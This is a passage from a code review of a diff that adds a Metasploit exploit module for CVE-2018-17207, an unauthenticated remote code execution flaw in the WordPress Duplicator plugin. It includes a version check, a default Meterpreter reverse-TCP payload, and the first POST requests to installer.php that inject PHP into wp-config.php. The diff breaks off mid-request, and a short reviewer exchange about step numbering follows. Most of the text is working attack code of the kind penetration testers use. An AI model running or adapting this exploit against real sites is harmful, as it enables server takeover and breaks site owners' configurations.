modules/exploits/multi/php/wordpress_duplicator.rb

```diff
@@ -0,0 +1,117 @@
+        installer.php and installer-backup.php. These files allow anyone to call a function that overwrite the wp-config.php file
+        AND this function does not sanitize POST parameters before inserting them inside the wp-config.php file, leading to
+        arbitrary PHP code execution.
+        WARNING: This exploit WILL break the wp-config.php file. If possible try to restore backups of the configuration after the exploit
+        to make the WordPress site work again.
+      },
+      'Author'          => [ 'Julien Legras <julien.legras@synacktiv.com>', 'Thomas Chauchefoin <thomas.chauchefoin@synacktiv.com>' ],
+      'References'     => [
+        ['URL', 'https://www.synacktiv.com/ressources/advisories/WordPress_Duplicator-1.2.40-RCE.pdf'],
+        ['WPVDB', '9123'],
+        ['CVE', '2018-17207']
+      ],
+      'License'         => MSF_LICENSE,
+      'Privileged'      => false,
+      'DisclosureDate'  => 'Aug 29 2018',
+      'DefaultOptions'  =>
+      {
+        'PAYLOAD' => 'php/meterpreter/reverse_tcp'
+      },
+
+      'Platform'        => 'php',
+      'Arch'            => ARCH_PHP,
+      'Targets'         => [['WordPress Duplicator <= 1.2.40', {}]],
+      'DefaultTarget'   => 0))
+
+    register_options([
+      OptString.new('TARGETURI', [true, "The TARGETURI where installer.php or installer-backup.php is located", "/installer.php"]),
+      ])
+  end
+
+  def check
+    tpath = normalize_uri(datastore['TARGETURI'])
+
+    print_status("Checking uri #{rhost+tpath}")
+    response = send_request_raw({ 'uri' => tpath})
+    version = response.body.to_s.scan( /version: ([^<]*)</).last.first
+    return Exploit::CheckCode::Vulnerable if Gem::Version.new(version) <= Gem::Version.new("1.2.40")
+    vprint_error("Server responded with #{response.code}")
+    return Exploit::CheckCode::Safe
+
+  end
+
+  def exploit
+    payload_oneline = payload.encoded.gsub(/\s*#.*$/, "").gsub("\n", "")
+
+    print_status("Checking if the wp-config.php file already exists...")
+    tpath_wp_config = normalize_uri(datastore['TARGETURI'] + '/../wp-config.php')
+    response = send_request_cgi({ 'uri' => tpath_wp_config})
+
+    if response.code == 404 # we have to perform action_step 2 to create the wp-config.php file.
+      print_status("This WordPress was not restored. Creating the wp-config.php file...")
+      # 1. GET the installer.php to retrieve the archive name.
+      response = send_request_cgi({'uri' => normalize_uri(datastore['TARGETURI'])})
+      archive_name = response.body.to_s.scan( /value="([^"]*.zip)"/)
+      if archive_name.length > 0
+        archive_name = archive_name.first.first
+        # 2. Perform the 1st step to actually create the wp-config.php file.
+        response = send_request_cgi({
+          'method' => 'POST',
+          'uri'    => normalize_uri(datastore['TARGETURI']),
+          'vars_post'   => {
+            'action_ajax' => "1",
+            'action_step' => "1",
```

Comment:
on line 65 you say we have to do step 2, then on line 72 you say we have to do step 1, then we do step 1.  I'm confused where action_step = 2 comes in?

Reply:
I'm going to assume this was a mixup between steps 1 and 2 of exploitation, versus `action_step=1` (and `action_step=3` for cleanup). Marking this as resolved.